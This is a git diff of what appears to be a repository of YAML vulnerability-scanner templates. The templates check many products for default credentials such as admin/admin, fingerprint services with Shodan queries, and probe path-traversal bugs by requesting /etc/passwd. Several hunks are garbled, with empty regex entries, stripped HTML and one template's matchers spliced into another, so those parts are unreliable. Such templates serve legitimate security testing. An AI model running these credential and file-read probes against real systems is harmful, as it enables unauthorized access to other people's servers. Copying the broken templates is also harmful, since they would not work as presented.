Content-Type: application/json;charset=UTF-8
{"username":"{{user}}","password":"{{pass}}"}
+
attack: pitchfork
payloads:
user:
- admin
pass:
- admin
+
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: word
words:
- '"data"'
- '"token"'
- '"code":0'
condition: and
+
+# Enhanced by mp on 2022/03/22
diff --git a/poc/default/apollo-default-login.yaml b/poc/default/apollo-default-login.yaml
index 696e2a1121..c9e119d097 100644
--- a/poc/default/apollo-default-login.yaml
+++ b/poc/default/apollo-default-login.yaml
@@ -1,18 +1,20 @@
id: apollo-default-login
+
info:
name: Apollo Default Login
author: PaperPen
severity: high
description: An Apollo default login was discovered.
- metadata:
- shodan-query: http.favicon.hash:11794165
reference:
- https://github.com/apolloconfig/apollo
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
+ metadata:
+ shodan-query: http.favicon.hash:11794165
tags: apollo,default-login
+
requests:
- raw:
- |
@@ -23,15 +25,18 @@ requests:
Referer: {{BaseURL}}/signin?
username={{user}}&password={{pass}}&login-submit=Login
+
- |
GET /user HTTP/1.1
Host: {{Hostname}}
+
attack: pitchfork
payloads:
user:
- apollo
pass:
- admin
+
cookie-reuse: true
req-condition: true
matchers-condition: and
@@ -42,6 +47,7 @@ requests:
- '"userId":'
- '"email":'
condition: or
+
- type: dsl
dsl:
- "status_code_1 == 302 && status_code_2 == 200"
diff --git a/poc/default/arl-default-login-539.yaml b/poc/default/arl-default-login-539.yaml
index 50f4ac4d1c..0b8d67077d 100644
--- a/poc/default/arl-default-login-539.yaml
+++ b/poc/default/arl-default-login-539.yaml
@@ -1,13 +1,8 @@
id: arl-default-login
info:
- name: ARL Default Admin Login
+ name: ARL Default Login
author: pikpikcu
- description: An ARL default admin login was discovered.
severity: high
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
tags: arl,default-login
requests:
- raw:
@@ -34,5 +29,3 @@ requests:
- type: status
status:
- 200
-
-# Enhanced by mp on 2022/03/22
diff --git a/poc/default/azkaban-default-login-674.yaml b/poc/default/azkaban-default-login-674.yaml
index 5e705ae10d..5d9e13ca58 100644
--- a/poc/default/azkaban-default-login-674.yaml
+++ b/poc/default/azkaban-default-login-674.yaml
@@ -1,47 +1,47 @@
-id: azkaban-default-login
-info:
- name: Azkaban Web Client Default Credential
- author: pussycat0x
- severity: high
- description: Azkaban is a batch workflow job scheduler created at LinkedIn to run Hadoop jobs. Default web client credentials were discovered.
- reference:
- - https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
- tags: default-login,azkaban
- classification:
- cwe-id: CWE-798
-requests:
- - raw:
- - |
- POST / HTTP/1.1
- Host: {{Hostname}}
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
- action=login&username={{username}}&password={{password}}
- payloads:
- username:
- - admin
- password:
- - admin
- attack: pitchfork
- matchers-condition: and
- matchers:
- - type: word
- words:
- - '"session.id"'
- - '"success"'
- condition: and
- - type: word
- words:
- - 'azkaban.browser.session.id'
- - 'application/json'
- condition: and
- part: header
- - type: status
- status:
- - 200
- extractors:
- - type: kval
- kval:
- - azkaban.browser.session.id
-
-# Enhanced by mp on 2022/03/03
+id: azkaban-default-login
+
+info:
+ name: Azkaban Web Client Default Credential
+ author: pussycat0x
+ severity: high
+ reference: https://www.shodan.io/search?query=http.title%3A%22Azkaban+Web+Client%22
+ tags: default-login,azkaban
+
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+
+ action=login&username={{username}}&password={{password}}
+
+ payloads:
+ username:
+ - admin
+ password:
+ - admin
+ attack: pitchfork
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"session.id"'
+ - '"success"'
+ condition: and
+
+ - type: word
+ words:
+ - 'azkaban.browser.session.id'
+ - 'application/json'
+ condition: and
+ part: header
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: kval
+ kval:
+ - azkaban.browser.session.id
diff --git a/poc/default/canal-default-login-848.yaml b/poc/default/canal-default-login-848.yaml
index a4c4a1b801..733d7d16f3 100644
--- a/poc/default/canal-default-login-848.yaml
+++ b/poc/default/canal-default-login-848.yaml
@@ -1,11 +1,16 @@
id: canal-default-login
-
info:
name: Alibaba Canal Default Login
author: pdteam
+ description: An Alibaba Canal default login was discovered.
severity: high
+ reference:
+ - https://github.com/alibaba/canal/wiki/ClientAdapter
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
tags: alibaba,default-login
-
requests:
- raw:
- |
@@ -14,22 +19,21 @@ requests:
Content-Type: application/json
{"username":"{{user}}","password":"{{pass}}"}
-
attack: pitchfork
payloads:
user:
- admin
pass:
- 123456
-
matchers-condition: and
matchers:
- type: status
status:
- 200
-
- type: word
condition: and
words:
- 'data":{"token"'
- '"code":20000'
+
+# Enhanced by mp on 2022/03/22
diff --git a/poc/default/cs141-default-login.yaml b/poc/default/cs141-default-login.yaml
index 1a1610de31..a7c1b33bda 100644
--- a/poc/default/cs141-default-login.yaml
+++ b/poc/default/cs141-default-login.yaml
@@ -1,16 +1,12 @@
id: cs141-default-login
info:
- name: UPS Adapter CS141 SNMP Module Default Login
+ name: CS141 SNMP Module Default Login
author: socketz
severity: medium
- description: UPS Adapter CS141 SNMP Module default login credentials were discovered.
- reference:
- - https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
- classification:
- cwe-id: CWE-798
- metadata:
- shodan-query: http.html:"CS141"
+ reference: https://www.generex.de/media/pages/packages/documents/manuals/f65348d5b6-1628841637/manual_CS141_en.pdf
tags: hiawatha,iot,default-login
+ metadata:
+ shodan-query: https://www.shodan.io/search?query=html%3A%22CS141%22
requests:
- raw:
- |
@@ -46,5 +42,3 @@ requests:
- type: kval
kval:
- accessToken
-
-# Enhanced by mp on 2022/03/07
diff --git a/poc/default/default-apache-test-page-6816.yaml b/poc/default/default-apache-test-page-6816.yaml
index d76fd5ac60..ade74d648c 100644
--- a/poc/default/default-apache-test-page-6816.yaml
+++ b/poc/default/default-apache-test-page-6816.yaml
@@ -4,8 +4,8 @@ info:
name: Apache HTTP Server Test Page
author: dhiyaneshDk
severity: info
- reference:
- - https://www.shodan.io/search?query=http.title%3A%22Apache+HTTP+Server+Test+Page+powered+by+CentOS%22
+ metadata:
+ shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS"
tags: tech,apache
requests:
diff --git a/poc/default/default-centos-test-page-6826.yaml b/poc/default/default-centos-test-page-6826.yaml
index 21c836f3cc..896f0ad6c1 100644
--- a/poc/default/default-centos-test-page-6826.yaml
+++ b/poc/default/default-centos-test-page-6826.yaml
@@ -1,17 +1,23 @@
id: default-centos-test-page
+
info:
name: CentOs-WebPanel Test Page
author: dhiyaneshDk
severity: info
- reference:
- - https://www.shodan.io/search?query=http.title%3A%22HTTP+Server+Test+Page+powered+by+CentOS-WebPanel.com%22
+ metadata:
+ max-request: 1
+ shodan-query: http.title:"HTTP Server Test Page powered by CentOS-WebPanel.com"
tags: tech,centos
-requests:
+
+http:
- method: GET
path:
- '{{BaseURL}}'
+
matchers:
- type: word
words:
- "
'
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
- - 'target="besite">(.*)
'
+id: bedita-detect
+
+info:
+ name: BEdita detect
+ author: pikpikcu
+ severity: info
+ tags: tech,bedita
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - 'BEdita(.*)
'
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - 'target="besite">(.*)
'
diff --git a/poc/detect/bigip-config-utility-detect.yaml b/poc/detect/bigip-config-utility-detect.yaml
index 4d3c250775..7ca3439c5e 100644
--- a/poc/detect/bigip-config-utility-detect.yaml
+++ b/poc/detect/bigip-config-utility-detect.yaml
@@ -4,12 +4,16 @@ info:
name: BIG-IP Configuration Utility detected
author: dwisiswant0
severity: info
+ metadata:
+ max-request: 3
+ tags: tech,bigip
-requests:
+http:
- method: GET
path:
- "{{BaseURL}}/tmui/login.jsp"
- "{{BaseURL}}/tmui/tmui/login/welcome.jsp"
+
matchers:
- type: word
words:
@@ -17,9 +21,11 @@ requests:
- "Configuration Utility"
condition: and
part: body
+
- method: GET
path:
- "{{BaseURL}}/mgmt/tm/sys/management-ip"
+
matchers:
- type: word
words:
@@ -27,7 +33,10 @@ requests:
- "Enterprise Manager"
condition: and
part: header
+
- type: word
words:
- "check your user-id and password and try again"
- part: body
\ No newline at end of file
+ part: body
+
+# digest: 4b0a00483046022100f8ef3b159105fe202ca01534cbc95d96b1ee1d9b0797d2b7a69ea786fb069fe3022100e9031155ddc9c9cf28f645d6aa996070c76ba606d138037cccdea4348bdb04ee:922c64590222798bb761d5b6d8e72950
diff --git a/poc/detect/burp-api-detect.yaml b/poc/detect/burp-api-detect.yaml
index d1c703aa98..68a7000ee7 100644
--- a/poc/detect/burp-api-detect.yaml
+++ b/poc/detect/burp-api-detect.yaml
@@ -4,9 +4,7 @@ info:
name: Burp Rest API Server Running
author: joanbono
severity: info
- reference:
- - https://portswigger.net/burp/documentation/enterprise/api-reference
- tags: burp,tech
+ reference: https://portswigger.net/burp/documentation/enterprise/api-reference
requests:
- method: GET
diff --git a/poc/detect/cacti-detect.yaml b/poc/detect/cacti-detect.yaml
index 10d928122a..b13f15fcbd 100644
--- a/poc/detect/cacti-detect.yaml
+++ b/poc/detect/cacti-detect.yaml
@@ -4,7 +4,6 @@ info:
author: geeknik
description: Cacti is a complete network graphing solution -- https://www.cacti.net/
severity: info
- tags: tech,cacti
requests:
- method: GET
@@ -33,4 +32,4 @@ requests:
- type: kval
part: header
kval:
- - Set_Cookie
+ - Set-Cookie
\ No newline at end of file
diff --git a/poc/detect/carestream-vue-detect-861.yaml b/poc/detect/carestream-vue-detect-861.yaml
index c49c48b023..9e39ae8399 100644
--- a/poc/detect/carestream-vue-detect-861.yaml
+++ b/poc/detect/carestream-vue-detect-861.yaml
@@ -7,20 +7,17 @@ info:
description: This template will detect a running CARESTREAM Vue Motion instance
reference:
- https://www.carestream.com/en/us/-/media/publicsite/resources/radiography-and-health-it/product-brochures/ris-pacs/pdfs/brochure-vue-motion-201601.pdf
- metadata:
- max-request: 2
tags: tech,myvuehelp
-http:
+requests:
- method: GET
path:
- "{{BaseURL}}/portal/favicon.ico"
- "{{BaseURL}}/portal/images/MyVue/MyVueHelp.png"
- host-redirects: true
+ redirects: true
stop-at-first-match: true
max-redirects: 2
-
matchers-condition: or
matchers:
- type: dsl
@@ -31,6 +28,4 @@ http:
- type: dsl
name: "myvuehelp-favicon"
dsl:
- - "status_code==200 && (\"1c4b2c10acccc48852d12eddadaf7944\" == md5(body))"
-
-# digest: 4a0a0047304502202aa3815b8f72b57cadb19de2cc86ba80a0a522bc8e65806218ea4f28cc837f7a022100820759ab55360d8f1aad39af864f4baa1f6b2e92dce3a43961f73f7f1c737b53:922c64590222798bb761d5b6d8e72950
+ - "status_code==200 && (\"1c4b2c10acccc48852d12eddadaf7944\" == md5(body))"
\ No newline at end of file
diff --git a/poc/detect/chevereto-detect.yaml b/poc/detect/chevereto-detect.yaml
index 59ba07f6fa..070a428307 100644
--- a/poc/detect/chevereto-detect.yaml
+++ b/poc/detect/chevereto-detect.yaml
@@ -4,14 +4,12 @@ info:
name: Chevereto detect
author: pikpikcu
severity: info
- metadata:
- shodan-query: http.title:"Centreon"
tags: tech,chevereto
requests:
- method: GET
path:
- - "{{BaseURL}}"
+ - "{{BaseURL}}/login"
matchers-condition: and
matchers:
@@ -20,10 +18,6 @@ requests:
regex:
- 'content="Chevereto(.*)">'
- - type: status
- status:
- - 200
-
extractors:
- type: regex
part: body
diff --git a/poc/detect/citrix-adc-gateway-detect-983.yaml b/poc/detect/citrix-adc-gateway-detect-983.yaml
index a542c13028..c8db1fce4c 100644
--- a/poc/detect/citrix-adc-gateway-detect-983.yaml
+++ b/poc/detect/citrix-adc-gateway-detect-983.yaml
@@ -1,18 +1,16 @@
id: citrix-adc-gateway-panel
-
info:
name: Citrix ADC Gateway detect
author: organiccrap
severity: info
- tags: panel,citrix
-
requests:
- method: GET
path:
- '{{BaseURL}}/logon/LogonPoint/index.html'
- '{{BaseURL}}/logon/LogonPoint/custom.html'
-
+ headers:
+ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
matchers:
- type: word
words:
- - '_ctxstxt_CitrixCopyright'
+ - _ctxstxt_CitrixCopyright
diff --git a/poc/detect/confluence-detect-1189.yaml b/poc/detect/confluence-detect-1189.yaml
index 0e17bc5ab9..4809b79801 100644
--- a/poc/detect/confluence-detect-1189.yaml
+++ b/poc/detect/confluence-detect-1189.yaml
@@ -1,17 +1,27 @@
id: confluence-detect
info:
- name: Confluence Detect
- author: philippedelteil
+ name: Confluence Detection
+ author: philippedelteil,AdamCrosser,6mile
severity: info
- description: Allows you to detect Atlassian Confluence instances
+ description: |
+ This nuclei template is used to detect the presence of Confluence, a popular collaboration software.
+ classification:
+ cpe: cpe:2.3:a:atlassian:confluence_server:*:*:*:*:*:*:*:*
metadata:
- shodan-query: http.component:"Atlassian Confluence"
- tags: tech,confluence,atlassian
+ max-request: 5
+ vendor: atlassian
+ product: confluence_server
+ shodan-query:
+ - http.component:"Atlassian Confluence"
+ - http.component:"atlassian confluence"
+ category: productivity
+ tags: tech,confluence,atlassian,detect
-requests:
+http:
- method: GET
path:
+ - "{{BaseURL}}/dologin.action"
- "{{BaseURL}}"
- "{{BaseURL}}/pages"
- "{{BaseURL}}/confluence"
@@ -19,22 +29,25 @@ requests:
redirects: true
stop-at-first-match: true
- matchers-condition: or
matchers:
- - type: word
- part: header
- words:
- - '-confluence-'
- case-insensitive: true
-
- - type: word
- part: body
- words:
- - 'confluence-base-url'
+ - type: dsl
+ dsl:
+ - contains(to_lower(header), '-confluence-')
+ - contains(to_lower(body), 'confluence-base-url')
extractors:
- type: regex
- part: body
+ name: version
group: 1
regex:
+ - ''
- 'Atlassian Confluence ([a-z0-9-._]+)'
+
+ - type: regex
+ name: hostname
+ group: 1
+ regex:
+ - ''
+ - ''
+ - ''
+# digest: 4a0a004730450221009bf2f9a3fec8732657aa0e11ec7a7bad6998606a6fdf448adb743732992b14f3022027018043be481632180a2d55600542cba51743a087e2657c16dbd23428ea2382:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/detect/contentkeeper-detect.yaml b/poc/detect/contentkeeper-detect.yaml
index c7507a5657..b5b6a8daf5 100644
--- a/poc/detect/contentkeeper-detect.yaml
+++ b/poc/detect/contentkeeper-detect.yaml
@@ -5,8 +5,7 @@ info:
author: geeknik
severity: info
description: ContentKeeper Cloud is the next evolution of cloud filtering that provides schools a seamless and secure way to enable safer and more effective hybrid learning.
- reference:
- - https://www.contentkeeper.com/
+ reference: https://www.contentkeeper.com/
tags: contentkeeper,panel
requests:
diff --git a/poc/detect/csrfguard-detect-1291.yaml b/poc/detect/csrfguard-detect-1291.yaml
index a751a4538e..f3242a8547 100644
--- a/poc/detect/csrfguard-detect-1291.yaml
+++ b/poc/detect/csrfguard-detect-1291.yaml
@@ -1,29 +1,24 @@
id: csrf-guard-detect
info:
- name: OWASP CSRFGuard 3.x/4.x - Detect
+ name: OWASP CSRF Guard detection
author: forgedhallpass
severity: info
- description: OWASP CSRFGuard 3.x and 4.x were checked for whether token-per-page support is enabled based on default configuration.
- reference:
- - https://github.com/OWASP/www-project-csrfguard
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
- cvss-score: 0
- cwe-id: CWE-200
- metadata:
- max-request: 3
+ description: Detects OWASP CSRF Guard 3.x & 4.x versions and whether token-per-page support is enabled based on default configuration.
+ reference: https://github.com/OWASP/www-project-csrfguard
tags: tech,csrfguard,owasp
-http:
+requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
+
- |
GET /JavaScriptServlet HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
+
- |
POST /JavaScriptServlet HTTP/1.1
Host: {{Hostname}}
@@ -55,6 +50,7 @@ http:
- 'status_code_3==200'
- 'contains(body, "{\"pageTokens")'
+ cookie-reuse: true
extractors:
- type: regex
name: masterToken
@@ -73,5 +69,3 @@ http:
name: "page-token"
json:
- '.pageTokens'
-
-# digest: 4a0a00473045022100be9f0de5a4ed056ec8b1e162a22cd7e372cb88f262008a0f459d95a8b07463c80220102efa4fe89248e28958130257b44a7e4af82ac033f6c447f6c5a99ca5ba299f:922c64590222798bb761d5b6d8e72950
diff --git a/poc/detect/darkstat-detect.yaml b/poc/detect/darkstat-detect.yaml
index 630b00c077..89c8d405d8 100644
--- a/poc/detect/darkstat-detect.yaml
+++ b/poc/detect/darkstat-detect.yaml
@@ -1,5 +1,4 @@
id: darkstat-detect
-
info:
name: Detect Darkstat Reports
author: geeknik
@@ -7,7 +6,6 @@ info:
reference: https://unix4lyfe.org/darkstat/
severity: high
tags: darkstat,logs,exposure
-
requests:
- method: GET
path:
@@ -28,7 +26,6 @@ requests:
- "Measuring for"
- "hosts"
condition: and
-
extractors:
- type: kval
part: header
diff --git a/poc/detect/dell-idrac6-detect.yaml b/poc/detect/dell-idrac6-detect.yaml
index ebca549e38..3a52fd5ad5 100644
--- a/poc/detect/dell-idrac6-detect.yaml
+++ b/poc/detect/dell-idrac6-detect.yaml
@@ -2,8 +2,8 @@ id: dell-idrac6-detect
info:
name: Detect Dell iDRAC6
author: kophjager007
- severity: info
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
+ severity: info
tags: tech,dell
requests:
- method: GET
diff --git a/poc/detect/dell-idrac7-detect-6922.yaml b/poc/detect/dell-idrac7-detect-6922.yaml
index f11ad8b32e..91cae2e567 100644
--- a/poc/detect/dell-idrac7-detect-6922.yaml
+++ b/poc/detect/dell-idrac7-detect-6922.yaml
@@ -4,14 +4,11 @@ info:
author: kophjager007
description: The Integrated Dell Remote Access Controller (iDRAC) is designed for secure local and remote server management and helps IT administrators deploy, update and monitor Dell EMC PowerEdge servers.
severity: info
-
+ tags: tech,dell
requests:
- method: GET
- headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
path:
- "{{BaseURL}}/data?get=prodServerGen"
-
matchers-condition: and
matchers:
- type: status
@@ -21,9 +18,8 @@ requests:
part: body
words:
- "12G"
-
extractors:
- type: regex
part: body
regex:
- - '[0-9]{2}G'
\ No newline at end of file
+ - '[0-9]{2}G'
diff --git a/poc/detect/detect-dns-over-https.yaml b/poc/detect/detect-dns-over-https.yaml
index 65d9a2bf23..8ac33de078 100644
--- a/poc/detect/detect-dns-over-https.yaml
+++ b/poc/detect/detect-dns-over-https.yaml
@@ -21,11 +21,13 @@ requests:
- type: status
status:
- 200
+
- type: word
+ part: header
words:
- "application/dns-message"
- part: header
+
- type: regex
+ part: header
regex:
- "(C|c)ontent-(L|l)ength: 49"
- part: header
diff --git a/poc/detect/detect-drone.yaml b/poc/detect/detect-drone.yaml
index 01384c4d0a..8095d264c8 100644
--- a/poc/detect/detect-drone.yaml
+++ b/poc/detect/detect-drone.yaml
@@ -1,17 +1,14 @@
id: detect-drone-config
-
info:
name: Detect Drone Configuration
author: geeknik
- description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone
severity: high
+ description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone
tags: config,exposure,drone
-
requests:
- method: GET
path:
- "{{BaseURL}}/.drone.yml"
-
matchers-condition: and
matchers:
- type: word
diff --git a/poc/detect/detect-sentry-6983.yaml b/poc/detect/detect-sentry-6983.yaml
index 8acee667d0..b6ab96f47f 100644
--- a/poc/detect/detect-sentry-6983.yaml
+++ b/poc/detect/detect-sentry-6983.yaml
@@ -1,21 +1,18 @@
id: detect-sentry
-
info:
name: Detect Sentry Instance
author: Sicksec
severity: info
tags: ssrf,sentry,tech
- reference: |
- - https://hackerone.com/reports/374737
- - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en
-
+ reference:
+ - https://hackerone.com/reports/374737
+ - https://twitter.com/itsecurityguard/status/1127893545619218432?lang=en
requests:
- method: GET
path:
- "{{BaseURL}}"
-
extractors:
- type: regex
part: body
regex:
- - "https://[0-9a-f]*@[a-z0-9]+\\.[a-z.]+.?[0-9]+"
\ No newline at end of file
+ - "https://[0-9a-f]*@[a-z0-9]+\\.[a-z.]+.?[0-9]+"
diff --git a/poc/detect/dns-waf-detect-7054.yaml b/poc/detect/dns-waf-detect-7054.yaml
index 8e953384fd..bdd9b4b38d 100644
--- a/poc/detect/dns-waf-detect-7054.yaml
+++ b/poc/detect/dns-waf-detect-7054.yaml
@@ -3,9 +3,6 @@ info:
name: DNS WAF Detection
author: lu4nx
severity: info
- description: A DNS WAF was detected.
- classification:
- cwe-id: CWE-200
tags: tech,waf,dns
dns:
- name: "{{FQDN}}"
@@ -138,5 +135,3 @@ dns:
name: edns
words:
- ".iidns.com"
-
-# Enhanced by mp on 2022/03/13
diff --git a/poc/detect/elasticsearch-sql-client-detect.yaml b/poc/detect/elasticsearch-sql-client-detect.yaml
index e075189456..b6efdc2579 100644
--- a/poc/detect/elasticsearch-sql-client-detect.yaml
+++ b/poc/detect/elasticsearch-sql-client-detect.yaml
@@ -1,23 +1,24 @@
-id: elasticsearch-sql-client-detect
-info:
- name: Elasticsearch SQL Client Detect
- author: pussycat0x
- severity: low
- reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22
- tags: elasticsearch,tech,sql
+id: elasticsearch-sql-client-detect
-requests:
- - method: GET
- path:
- - '{{BaseURL}}'
+info:
+ name: Elasticsearch SQL Client Detect
+ author: pussycat0x
+ severity: low
+ reference: https://www.shodan.io/search?query=http.title%3A%22Elasticsearch-sql+client%22
+ tags: elasticsearch,tech,sql
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Welcome to (.+)<\/h1>'
+ condition: or
+ - type: status
+ status:
+ - 200
diff --git a/poc/detect/jeedom-detect.yaml b/poc/detect/jeedom-detect.yaml
index 4154e6b7d0..b7c3ef8645 100644
--- a/poc/detect/jeedom-detect.yaml
+++ b/poc/detect/jeedom-detect.yaml
@@ -1,24 +1,19 @@
id: jeedom-detect
-
info:
name: Jeedom Detect
author: pikpikcu
severity: info
tags: tech,jeedom
-
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?v=d"
-
matchers-condition: and
matchers:
-
- type: word
part: body
words:
- "
Interactive Console
"
part: body
-
-# digest: 4a0a00473045022013ddd4960a4aea793abed2a46e4120c2dd2122fd149ec908a73cee9671ad065c022100cf561fa7d30e0f52d52a4b79c30869367c884abf9b90d158eaece619373644f4:922c64590222798bb761d5b6d8e72950
diff --git a/poc/detect/wordpress-plugins-detect.yaml b/poc/detect/wordpress-plugins-detect.yaml
index e6fcb6dba4..fb3b30feac 100644
--- a/poc/detect/wordpress-plugins-detect.yaml
+++ b/poc/detect/wordpress-plugins-detect.yaml
@@ -1,47 +1,29 @@
id: wordpress-plugins-detect
-
info:
name: WordPress Plugins Detection
- author: 0xcrypto, foulenzer
- severity: high
+ author: 0xcrypto
+ severity: info
tags: fuzz,wordpress
-
requests:
- raw:
- |
- GET /wp-content/plugins/{{plugin}}/readme.txt HTTP/1.1
+ GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1
Host: {{Hostname}}
threads: 50
payloads:
- plugin:
- - contact-form-7
- - wordpress-seo
- - elementor
- - woocommerce
- - all-in-one-wp-migration
- - updraftplus
- - all-in-one-seo-pack
- - duplicator
- - essential-addons-for-elementor-lite
- - optinmonster
- - w3-total-cache
- - redux-framework
- - ninja-forms
-
+ pluginSlug: helpers/wordlists/wordpress-plugins.txt
matchers-condition: and
matchers:
- type: status
status:
- 200
-
- type: word
words:
- "== Description =="
-
extractors:
- type: regex
part: body
group: 1
regex:
- "===\\s(.*)\\s===" # extract the plugin name
- - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version
\ No newline at end of file
+ - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version
diff --git a/poc/detect/wordpress-themes-detect-11316.yaml b/poc/detect/wordpress-themes-detect-11316.yaml
index 4c487c4563..cb4bd85628 100644
--- a/poc/detect/wordpress-themes-detect-11316.yaml
+++ b/poc/detect/wordpress-themes-detect-11316.yaml
@@ -1,23 +1,22 @@
id: wordpress-themes-detect
info:
- name: WordPress Theme Detection
- author: 0xcrypto, foulenzer
- severity: high
- tags: fuzz,wordpress
+ name: Find Wordpress Themes
+ author: micro.
+ severity: info
+ description: It detect the wordpress themes.
+ metadata:
+ max-request: 24434
-requests:
+http:
- raw:
- |
- GET /wp-content/themes/{{theme}}/readme.txt HTTP/1.1
+ GET /wp-content/themes/{{themeSlug}}/readme.txt HTTP/1.1
Host: {{Hostname}}
+
payloads:
- theme:
- - twentyfifteen
- - shapely
- - onepress
+ themeSlug: helpers/wordlists/wordpress-themes.txt
- threads: 50
matchers-condition: and
matchers:
- type: status
@@ -26,4 +25,4 @@ requests:
- type: word
words:
- - "== Description =="
\ No newline at end of file
+ - "== Description =="
diff --git a/poc/detect/wp-xmlrpc-pingback-detection-11627.yaml b/poc/detect/wp-xmlrpc-pingback-detection-11627.yaml
index d1f2247e27..e9faa5f0c8 100644
--- a/poc/detect/wp-xmlrpc-pingback-detection-11627.yaml
+++ b/poc/detect/wp-xmlrpc-pingback-detection-11627.yaml
@@ -3,10 +3,10 @@ info:
name: Wordpress XMLRPC Pingback detection
author: pdteam
severity: info
- tags: wordpress,ssrf,oast
reference:
- https://github.com/dorkerdevil/rpckiller
- https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
+ tags: wordpress,ssrf,oast,xmlrpc
requests:
- raw:
- |
diff --git a/poc/detect/yapi-detect.yaml b/poc/detect/yapi-detect.yaml
index 8cf92f5a49..3d24ff00ba 100644
--- a/poc/detect/yapi-detect.yaml
+++ b/poc/detect/yapi-detect.yaml
@@ -3,12 +3,13 @@ info:
name: YApi Detect
author: pikpikcu
severity: info
+ metadata:
+ shodan-query: http.title:"YApi"
tags: tech,yapi
requests:
- method: GET
path:
- - "{{BaseURL}}/"
- - "{{BaseURL}}:3000"
+ - "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
diff --git a/poc/directory_listing/Apexis-IPCAM-directory-traversal.yaml b/poc/directory_listing/Apexis-IPCAM-directory-traversal.yaml
old mode 100755
new mode 100644
diff --git a/poc/directory_listing/ecology-filedownload-directory-traversal-7171.yaml b/poc/directory_listing/ecology-filedownload-directory-traversal-7171.yaml
index ebe0ce2d65..3ebe236378 100644
--- a/poc/directory_listing/ecology-filedownload-directory-traversal-7171.yaml
+++ b/poc/directory_listing/ecology-filedownload-directory-traversal-7171.yaml
@@ -3,9 +3,8 @@ info:
name: Ecology Directory Traversal
author: princechaddha
severity: medium
- metadata:
- fofa-query: app="泛微-协同办公OA"
tags: ecology,lfi
+
requests:
- method: GET
path:
diff --git a/poc/directory_listing/ecology-springframework-directoryTraversal.yaml b/poc/directory_listing/ecology-springframework-directoryTraversal.yaml
old mode 100755
new mode 100644
diff --git a/poc/directory_listing/erp-nc-directory-traversal.yaml b/poc/directory_listing/erp-nc-directory-traversal.yaml
index e331d54978..c5d6ef641e 100644
--- a/poc/directory_listing/erp-nc-directory-traversal.yaml
+++ b/poc/directory_listing/erp-nc-directory-traversal.yaml
@@ -1,14 +1,17 @@
id: erp-nc-directory-traversal
+
info:
name: ERP-NC directory traversal
author: pikpikcu
severity: high
reference: https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
tags: lfi,erp-nc
+
requests:
- method: GET
path:
- "{{BaseURL}}/NCFindWeb?service=IPreAlertConfigService&filename="
+
matchers-condition: and
matchers:
- type: word
@@ -18,6 +21,7 @@ requests:
- "admin.jsp"
part: body
condition: and
+
- type: status
status:
- 200
diff --git a/poc/directory_listing/flir-path-traversal.yaml b/poc/directory_listing/flir-path-traversal.yaml
index 596e30a0de..dca421c8ce 100644
--- a/poc/directory_listing/flir-path-traversal.yaml
+++ b/poc/directory_listing/flir-path-traversal.yaml
@@ -1,25 +1,20 @@
id: flir-path-traversal
-
info:
name: Flir Path Traversal
author: pikpikcu
severity: high
reference: https://juejin.cn/post/6961370156484263972
tags: flir,lfi
-
requests:
- method: GET
path:
- "{{BaseURL}}/download.php?file=/etc/passwd"
-
matchers-condition: and
matchers:
-
- type: regex
regex:
- - "root:.*:0:0"
+ - "root:.*:0:0:"
condition: and
-
- type: status
status:
- 200
diff --git a/poc/directory_listing/ibm-infoprint-directory-traversal-8098.yaml b/poc/directory_listing/ibm-infoprint-directory-traversal-8098.yaml
index fdbcdb53af..f9fbad5322 100644
--- a/poc/directory_listing/ibm-infoprint-directory-traversal-8098.yaml
+++ b/poc/directory_listing/ibm-infoprint-directory-traversal-8098.yaml
@@ -1,15 +1,10 @@
id: ibm-infoprint-lfi
info:
- name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Local File Inclusion
+ name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
author: harshbothra_
